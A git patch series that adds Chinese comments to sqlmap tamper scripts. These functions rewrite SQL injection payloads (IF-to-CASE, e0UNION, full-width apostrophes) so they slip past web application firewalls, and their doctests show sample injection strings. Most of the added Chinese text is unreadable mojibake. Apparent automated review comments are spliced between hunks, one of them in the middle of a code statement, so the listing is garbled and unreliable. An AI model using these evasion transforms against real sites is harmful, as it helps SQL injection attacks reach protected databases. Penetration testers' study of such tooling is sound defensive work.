From e12d3d9d99e1e364ce5d75a7bd7ea61f6cfad9e0 Mon Sep 17 00:00:00 2001 From: sck <2238502556@qq.com> Date: Wed, 23 Oct 2024 18:42:08 +0800 Subject: [PATCH 1/9] =?UTF-8?q?=E7=BB=95=E8=BF=87=E9=98=B2=E7=81=AB?= =?UTF-8?q?=E5=A2=99?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- src/sqlmap-master/tamper/chardoubleencode.py | 1 + 1 file changed, 1 insertion(+) diff --git a/src/sqlmap-master/tamper/chardoubleencode.py b/src/sqlmap-master/tamper/chardoubleencode.py index ea711b4..e4eb824 100644 --- a/src/sqlmap-master/tamper/chardoubleencode.py +++ b/src/sqlmap-master/tamper/chardoubleencode.py @@ -6,6 +6,7 @@ See the file 'LICENSE' for copying permission """ import string +# 导入 Python 的 string 模块,它包含了许多用于字符串操作的常量和类 from lib.core.enums import PRIORITY From ac4550a65dc0b752a236b87a5a0acf85708bb87c Mon Sep 17 00:00:00 2001 From: sck <2238502556@qq.com> Date: Mon, 16 Dec 2024 21:30:04 +0800 Subject: [PATCH 2/9] =?UTF-8?q?=E4=BF=AE=E6=94=B9if2case?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- src/sqlmap-master/tamper/if2case.py | 81 ++++++++++++++--------------- 1 file changed, 40 insertions(+), 41 deletions(-) diff --git a/src/sqlmap-master/tamper/if2case.py b/src/sqlmap-master/tamper/if2case.py index 2e3a01f..125f66d 100644 --- a/src/sqlmap-master/tamper/if2case.py +++ b/src/sqlmap-master/tamper/if2case.py 
@@ -5,18 +5,19 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ -from lib.core.compat import xrange -from lib.core.enums import PRIORITY -from lib.core.settings import REPLACEMENT_MARKER +from lib.core.compat import xrange # 鐢ㄤ簬鍏煎Python 2鍜3鐨剅ange鍑芥暟 +from lib.core.enums import PRIORITY # 瀵煎叆浼樺厛绾ф灇涓 +from lib.core.settings import REPLACEMENT_MARKER # 瀵煎叆鏇挎崲鏍囪 -__priority__ = PRIORITY.HIGHEST +__priority__ = PRIORITY.HIGHEST # 璁剧疆浼樺厛绾т负鏈楂 def dependencies(): + """姝ゅ嚱鏁扮敤浜庡畾涔夋tamper鍑芥暟鐨勪緷璧栭」銆傚綋鍓嶅疄鐜颁负绌猴紝鏍规嵁闇瑕佸彲浠ユ坊鍔犲叿浣撶殑渚濊禆椤""" pass def tamper(payload, **kwargs): """ - Replaces instances like 'IF(A, B, C)' with 'CASE WHEN (A) THEN (B) ELSE (C) END' counterpart + 鏇挎崲IF鏉′欢琛ㄨ揪寮忎负CASE琛ㄨ揪寮 Requirement: * MySQL 
@@ -27,45 +28,43 @@ def tamper(payload, **kwargs): * MySQL 5.0 and 5.5 Notes: - * Useful to bypass very weak and bespoke web application firewalls - that filter the IF() functions + * 閫傜敤浜庣粫杩囬潪甯稿急涓斿畾鍒剁殑web搴旂敤绋嬪簭闃茬伀澧欙紝璇ラ槻鐏杩囨护浜咺F()鍑芥暟 - >>> tamper('IF(1, 2, 3)') - 'CASE WHEN (1) THEN (2) ELSE (3) END' - >>> tamper('SELECT IF((1=1), (SELECT "foo"), NULL)') - 'SELECT CASE WHEN (1=1) THEN (SELECT "foo") ELSE (NULL) END' - """ - - if payload and payload.find("IF") > -1: - payload = payload.replace("()", REPLACEMENT_MARKER) - while payload.find("IF(") > -1: - index = payload.find("IF(") - depth = 1 - commas, end = [], None - - for i in xrange(index + len("IF("), len(payload)): - if depth == 1 and payload[i] == ',': - commas.append(i) + Examples: + >>> tamper('IF(1, 2, 3)') + 'CASE WHEN (1) THEN (2) ELSE (3) END' - elif depth == 1 and payload[i] == ')': - end = i - break - - elif payload[i] == '(': - depth += 1 - - elif payload[i] == ')': - depth -= 1 + >>> tamper('SELECT IF((1=1), (SELECT "foo"), NULL)') + 'SELECT CASE WHEN (1=1) THEN (SELECT "foo") ELSE (NULL) END' + """ - if len(commas) == 2 and end: - a = payload[index + len("IF("):commas[0]].strip("()") - b = payload[commas[0] + 1:commas[1]].lstrip().strip("()") - c = payload[commas[1] + 1:end].lstrip().strip("()") - newVal = "CASE WHEN (%s) THEN (%s) ELSE (%s) END" % (a, b, c) - payload = payload[:index] + newVal + payload[end + 1:] + if payload and payload.find("IF") > -1: # 妫鏌ayload鏄惁鍖呭惈IF + payload = payload.replace("()", REPLACEMENT_MARKER) # 鏇挎崲绌虹殑()涓篟EPLACEMENT_MARKER + while payload.find("IF(") > -1: # 妫鏌ayload涓槸鍚﹁繕鍖呭惈IF( + index = payload.find("IF(") # 鎵惧埌IF(鐨勪綅缃 + depth = 1 # 鍒濆鍖栨繁搴﹁鏁板櫒 + commas, end = [], None # 鍒濆鍖栭楀彿鍒楄〃鍜岀粨鏉熶綅缃 + + for i in xrange(index + len("IF("), len(payload)): # 閬嶅巻IF(鍚庣殑瀛愪覆 + if depth == 1 and payload[i] == ',': # 濡傛灉娣卞害涓1涓旈亣鍒伴楀彿 + commas.append(i) # 璁板綍閫楀彿浣嶇疆 + elif depth == 1 and payload[i] == ')': # 濡傛灉娣卞害涓1涓旈亣鍒板彸鎷彿 + end = i # 璁板綍缁撴潫浣嶇疆 + break # 缁撴潫寰幆 + elif 
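Review bot: The non-ASCII comments appended to the import lines in this hunk (`from lib.core.compat import xrange  # ...` and the two below it) and the new `dependencies()` docstring sit in a file with no coding declaration in the visible lines, while the `xrange` compat import on those same lines shows the module is still meant to load under Python 2, where non-ASCII bytes without a PEP 263 header are a SyntaxError. Unless one of the first four lines (outside this hunk) already declares it, add `# -*- coding: utf-8 -*-` directly under the shebang, or drop Python 2 support deliberately rather than by accident. The comment text also renders here as UTF-8 bytes decoded as GBK, which may be an artifact of this page, but it is worth confirming that the committed bytes are UTF-8. The rewritten `tamper` summary no longer says what is rewritten into what; keep the original line `Replaces instances like 'IF(A, B, C)' with 'CASE WHEN (A) THEN (B) ELSE (C) END' counterpart` above the translation. `tamper` continues past the end of this hunk.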
payload[i] == '(': # 濡傛灉閬囧埌宸︽嫭鍙 + depth += 1 # 澧炲姞娣卞害 + elif payload[i] == ')': # 濡傛灉閬囧埌鍙虫嫭鍙 + depth -= 1 # 鍑忓皯娣卞害 + + if len(commas) == 2 and end: # 濡傛灉鏈2涓楀彿骞朵笖鏈夌粨鏉熶綅缃 + a = payload[index + len("IF("):commas[0]].strip("()") # 鎻愬彇绗竴涓弬鏁 + b = payload[commas[0] + 1:commas[1]].lstrip().strip("()") # 鎻愬彇绗簩涓弬鏁 + c = payload[commas[1] + 1:end].lstrip().strip("()") # 鎻愬彇绗笁涓弬鏁 + newVal = "CASE WHEN (%s) THEN (%s) ELSE (%s) END" % (a, b, c) # 鏋勯燙ASE琛ㄨ揪寮 + payload = payload[:index] + newVal + payload[end + 1:] # 鏇挎崲IF()涓篊ASE else: - break + break # 濡傛灉涓嶇鍚堟潯浠讹紝璺冲嚭寰幆 - payload = payload.replace(REPLACEMENT_MARKER, "()") + payload = payload.replace(REPLACEMENT_MARKER, "()") # 灏哛EPLACEMENT_MARKER鏇挎崲鍥()锛岄槻姝㈠奖鍝嶅叾浠栭儴鍒 - return payload + return payload \ No newline at end of file From b2880b499320c050bf54d2910d89b1f5c9c1109f Mon Sep 17 00:00:00 2001 From: sck <2238502556@qq.com> Date: Mon, 16 Dec 2024 21:31:02 +0800 Subject: [PATCH 3/9] =?UTF-8?q?=E4=BF=AE=E6=94=B9doc?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- doc/sqlmap-娉涜鎶ュ憡.docx | Bin 0 -> 9999 bytes 1 file changed, 0 insertions(+), 0 deletions(-) 
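Review bot: The hunk ends with `\ No newline at end of file` on `return payload`, so the rewrite dropped the file's trailing newline; restore it so the next edit of this file does not show a spurious change on that line. While the extraction lines are being annotated, note that `a = payload[index + len("IF("):commas[0]].strip("()")` strips every leading and trailing parenthesis rather than one matched pair, so a first argument such as `(a) AND b` becomes `a) AND b` and the emitted `CASE WHEN (a) AND b) THEN ...` is unbalanced. That behaviour is pre-existing, but the new comment on that line could record the limitation, e.g. `# strips *all* outer parens; an argument like '(a) AND b' comes out unbalanced`. `tamper` starts before this hunk.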
diff --git a/doc/sqlmap-娉涜鎶ュ憡.docx b/doc/sqlmap-娉涜鎶ュ憡.docx index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..fd2395a3afc52376abfb989e69a0920868f3377e 100644 GIT binary patch literal 9999 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

hkCPeu513ucU2dWi#4mcjB}OR&_hl6bI(gBIGQ zg8+b}SZAOH{m$R}+2I$r7!t@y0E{AcQ5`C+^*lRBD0d?K7 z8LLymTp<*ZY>fIh)^D9`xvkP%d}>5C#BEBOu0f*ywlYk95}8BIGU=BoSBzFGiC6O%#QvQZ?AH>qF4)!8=#9aqOd@Zo6kB(G!J&pZ$91E1$5__X7zR1{@R;Bj~S z`>Q)VFX4O6%iZmFEM%VReMm$PH;SL{&UX_&kgJV$rs5e0U;UVg!CUgU-$eT)049kD z;PwzWoZ<@di+`K>}f<0{I({%g2horlya)Zw1LIN1%xYmzfb}gIvYg$;AWZkun9N zMfJ^upnyvX)~L2{Hd3DY?~W=$KNgC7GromTr47>@Rm&R6bMR)jg!3Q+eKR-l>Xqg$ zrKK`?-VqDaf{(Nk)6mgjz_2});d43hLBu>MbS;|r%IScz*V-h3#91X)-eXz_q)K!X z%nKQkwHzr!cI(}MleGv$qccc3n1klu7HT4z_g#FGQcWIo&Ay(ltKTuSV&^5*2fwQU z<+-puO#u38y<`?pH&vgh-gcIZa$qqtZ!}Ma72%D7>y0P zdk6C@lh4ayWW{|cb!zft&JGmHjEtgV13Rq$>adyPq1XK--Toj!&yCn&3k;*c5i{~L zpyxpMI=yvtXZADW(Sv2o2-zeF>|{)gmx=?q z33R;VUyaY|QR#eRoA-I613_0QAKt$MUS4MfU%?ohC{L~+wy%mVzl>^3)d1Q}0h@OE z?@>f07h63`ngmi}o_I$WCv}hNs;;-NAGBeIi_24&S3Ws~&wDCR)dJ z-9ASD)aOcNW2QqHg0xX%!DWqDy`6U?!)fT3oO>-xLAAKEmV8h_;*ki3++^Vt(%Em&~ezxEizRau-j5 zS1;V467^*Ij8w+XhD2yL5Rc$Za7^23bD^;n z-`A=K#E1~#D=LQ}k*PuP2(@Fjfq^Ou1G|1ry+kEC+a9!r(r)yIp&;Uk*q##+oi9vM zdJ`L{ka+Xp#xH3#cUmD5#-%RwwhygL5JUrNar_CD?@E>$yyw}ij4T9}?%&jIJz($M zcyTww>3u=EC{capzYRfHeTVj|mzs;dw%G8P@qGvP4=?qxVB&0JYU}hf=c_Jb_k$d} z^%Lhq$7=etLQH?nj@pEiG8#u=?7091{u~`QdArfLfiRk#OkY~zVDSDC6Pl~8?tOu* zonoAsFD+dvY=3rYQ0$R_sN$!(7so9_%LLz}>9jiQz9r_hL zAfKD(N)nn}pL~DO3y;r^nc!MzJML6>Ze7;{pA4LDr6n)WO5<1sKT&I33dxUJS2XKL zjWr@fp$$mpmp0(cTYT+>`9UK}KWwi@2#tkpbt2Aj3r~%f{|vU6XMy;bL?YM?)yG|z zCg>P6vElT}H$4<|oe+A;&u!s;{J^mFMp)X&xXSlAjA`;_Q!>Bh1fqS|E1*khr7f}s zY%E7ViU%_H#b zT$v5w3SVtXs-dr&DA}*w09UBl83eZeKJIUIncuin>L{hE;cdE)B(V43-lYhNq!$Aqu*ZM8g4yD8$yrt!sQ;#X}6q! 
z$z^8-z`}@6)~et-7(g3Wd}9c+ZC(qcP0CoFp?lTPHQ6*VaF4OfBl7wsWlL z&3Id6(2H16A;k1jvE*+lGZIK=u>~jCO|fufd}6b&Q3P@Bq=l8%c=j{fwxX+l@Wvw( zy%6gNsGik}%ubp)8MMnnJV@l$1tCWnhe6UHajiHcXMU}_QVxNfP~yvsi)Iu@G8-DHiUC)u>5RgXo^fKUd8JKB`(tw1TqbHZ zYk$P(&9j)1I-HPADZWoCzm6%qw0+ttmOwk(Ek%8(vIRd5MQYFR7i|HR;;_!l*(8B3g*;aofZuvLA73p z*?+BJ*a!YpTcg1F=xgNR|f@G`RFGPfmOFLT!&O$9?oq@x6%HIR9|@H*fE zYD_y}uCj%n({|&4t9K-Tom1_B(+J%mR6AI(+hQHn^Y{<1g~jF}pvS^DIp|;v@kOa* z;HF-E81{q~THQhDPbY!<{A!!Sh}(%h7}M0F(TXmKgxW z6%qrb*Qu}~pHL2H;?{lr25)0k_{pmOd+hKS89*2~m|Fi{{svG`klj6gxAOR_c#1Fn zpkaQZEQwx_gSOWHV=>;ll)3=`dJ=T-0D(wzyQx zx#&F}B_lV+uUC3(aMc2279O{10!}8!0Yd_qy}Z&+XP+gmBl+sx($R+TqKQ3+HcxkI{hK)Zv0;@qAH|seC{E(X=g)M{AB6vWo&G7`ua;e`$i0VtEq-I3Z^y&gq|)?z zGp3>hy*KH+5{-%Ehz92rp=WE98s(S+6g!tL#K&DOINZ*{lX~%y)g%!R{X+Ng-$NY^ z?=E1`y(ZGxH5P&5z}(xJOW7xSKX@D*z!rs>AOZ`!aazpP0HBqVe2Jek(IcRZo8+EW zd{ZsBBd;yAs#kX)V_WFx^74HfF%t-2}n z0{rS}cz|R+ynd`NV?S0vpX$r6#2>BiqmyBv=4Nl|sQ2V+)Wi1WKO{g?0>L0sD0qG6si3DO_!_Y}}?G|;I-~c%E_baeDvM$M~cL;d>C4-jTa!^6^ zt5ckD%G-)uFm7|Z3o;}EK6$Ch$ZW&{q9q&gm7COF`YBZ9bd`N)-2v)|IN4k}7%2n( zWiE7A0ZQNj7u1oL-9+EfkI6F$t_aGtFM21bR7JTpg7xE!QM6$M6@XbLnX9e?fMKO6 zDJb(H5=|wMs&&Ld0S787_Ht*Tf$zYMD{yJH+1X4tpNjn^$2;!gxkQ7`HnGCw)+s%` zS?8EuE-R6>AN$r7@-73H2l>Q>Eob>xtP0-(@5B%JN%n%RvlV5@(JKV>Z^_Py8`mZf zt1H1|kTwT00!JiJm7eD;wwdAEk(DhI0ZU4907z_zzk6VQSIVPaAOH~LkALHV|Ei)t z7WnU$=4pXH+G!xk{<0~*Z~D9Cc|!cLDb0T{KYu6x+h&jN@ju5?@6OZsN1M;DO#a^J z^F;i|ezgCD{n_^O`)Pk~PWc;M@pzm6v*};0D!;>jZ>#tl&JFcX_=U;*Uk4gJ|rQhR Date: Tue, 24 Dec 2024 21:32:56 +0800 Subject: [PATCH 4/9] =?UTF-8?q?2024-12-24=2021=EF=BC=9A32?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- src/sqlmap-master/tamper/0eunion.py | 35 ++++++++++++------- src/sqlmap-master/tamper/apostrophemask.py | 20 +++++++---- .../tamper/apostrophenullencode.py | 22 +++++++++--- src/sqlmap-master/tamper/appendnullbyte.py | 31 +++++++++------- 4 files changed, 73 insertions(+), 35 deletions(-) 
diff --git a/src/sqlmap-master/tamper/0eunion.py b/src/sqlmap-master/tamper/0eunion.py index 9342053..aee154a 100644 --- a/src/sqlmap-master/tamper/0eunion.py +++ b/src/sqlmap-master/tamper/0eunion.py @@ -9,24 +9,35 @@ import re from lib.core.enums import PRIORITY -__priority__ = PRIORITY.HIGHEST +__priority__ = PRIORITY.HIGHEST # 璁剧疆浼樺厛绾т负鏈楂 def dependencies(): pass def tamper(payload, **kwargs): """ - Replaces instances of UNION with e0UNION - - Requirement: - * MySQL - * MsSQL - - Notes: - * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf - - >>> tamper('1 UNION ALL SELECT') - '1e0UNION ALL SELECT' + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屼互缁曡繃鏌愪簺瀹夊叏闃叉姢鎺柦銆 + + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 鍔熻兘锛 + 灏唒ayload涓殑 UNION鏇挎崲涓e0UNION锛屼互灏濊瘯缁曡繃瀹夊叏闃叉姢銆 + + 瑕佹眰锛 + * 閫傜敤浜嶮ySQL鍜孧sSQL鏁版嵁搴撱 + + 娉ㄦ剰锛 + * 鍙傝冩枃妗o細https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf + * 璇ュ嚱鏁板亣璁捐緭鍏ョ殑payload鏄湁鏁堢殑锛屽苟涓斾笉杩涜浠讳綍閿欒澶勭悊銆 + + 绀轰緥锛 + >>> tamper('1 UNION ALL SELECT') + '1e0UNION ALL SELECT' """ + + # 浣跨敤姝e垯琛ㄨ揪寮忔浛鎹ayload涓殑鏁板瓧鍜孶NION涔嬮棿鐨勭┖鏍间负'e0' + # \g<1>琛ㄧず鍖归厤鐨勭涓涓嫭鍙蜂腑鐨勫唴瀹癸紝\g<2>琛ㄧず绗簩涓嫭鍙蜂腑鐨勫唴瀹 return re.sub(r"(?i)(\d+)\s+(UNION )", r"\g<1>e0\g<2>", payload) if payload else payload diff --git a/src/sqlmap-master/tamper/apostrophemask.py b/src/sqlmap-master/tamper/apostrophemask.py index 113b5bf..0eaf56e 100644 --- a/src/sqlmap-master/tamper/apostrophemask.py +++ b/src/sqlmap-master/tamper/apostrophemask.py 
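Review bot: The new docstring's note that the function assumes a valid payload and performs no error handling is contradicted by the only code line, `return re.sub(...) if payload else payload`, which passes an empty or `None` payload through untouched; drop that sentence or replace it with `* An empty/None payload is returned unchanged`. The comment above the `re.sub` describes it as replacing the whitespace between a number and `UNION`, but the pattern `(?i)(\d+)\s+(UNION )` also requires a space after `UNION`, so e.g. `1 UNION(SELECT ...)` is left alone; the comment should say so. Keeping the original English summary `Replaces instances of UNION with e0UNION` beside the translation would preserve the quick-scan description for readers who cannot read the new text.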
@@ -7,23 +7,31 @@ See the file 'LICENSE' for copying permission from lib.core.enums import PRIORITY -__priority__ = PRIORITY.LOWEST +__priority__ = PRIORITY.LOWEST# 璁剧疆浼樺厛绾т负鏈浣 def dependencies(): pass def tamper(payload, **kwargs): """ - Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g. ' -> %EF%BC%87) + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢鍏朵腑鐨勫崟寮曞彿瀛楃锛'锛夋浛鎹负鍏禪TF-8鍏ㄨ瀛楃瀵瑰簲鐗┿ - References: + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 鍔熻兘锛 + 灏唒ayload涓殑鍗曞紩鍙凤紙'锛夋浛鎹负UTF-8缂栫爜鐨勫叏瑙掑崟寮曞彿锛%EF%BC%87锛夛紝鐢ㄤ簬缁曡繃鏌愪簺瀹夊叏闃叉姢鎺柦銆 + + 鍙傝冮摼鎺ワ細 * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128 * https://web.archive.org/web/20130614183121/http://lukasz.pilorz.net/testy/unicode_conversion/ * https://web.archive.org/web/20131121094431/sla.ckers.org/forum/read.php?13,11562,11850 * https://web.archive.org/web/20070624194958/http://lukasz.pilorz.net/testy/full_width_utf/index.phps - >>> tamper("1 AND '1'='1") - '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' + 绀轰緥锛 + >>> tamper("1 AND '1'='1") + '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' """ - + # 鏇挎崲payload涓殑鍗曞紩鍙蜂负UTF-8鍏ㄨ鍗曞紩鍙 return payload.replace('\'', "%EF%BC%87") if payload else payload diff --git a/src/sqlmap-master/tamper/apostrophenullencode.py b/src/sqlmap-master/tamper/apostrophenullencode.py index 7a3cd18..d850c00 100644 --- a/src/sqlmap-master/tamper/apostrophenullencode.py +++ b/src/sqlmap-master/tamper/apostrophenullencode.py 
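Review bot: `__priority__ = PRIORITY.LOWEST# ...` has no separator before the inline comment; PEP 8 asks for at least two spaces before `#` and one after, so write `__priority__ = PRIORITY.LOWEST  # ...` (the apostrophenullencode hunk in this same patch has the identical slip). The summary line of the new docstring drops the original's concrete example `(e.g. ' -> %EF%BC%87)`; the doctest still shows the result, but the first docstring line is, as far as I recall, what `--list-tampers` prints, so keeping the English one-liner above the translation is worth it — verify that against `lib/core/option.py`. The comment placed directly above the `return` is fine, but the blank line the hunk removed between the docstring and the `return` should stay for readability.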
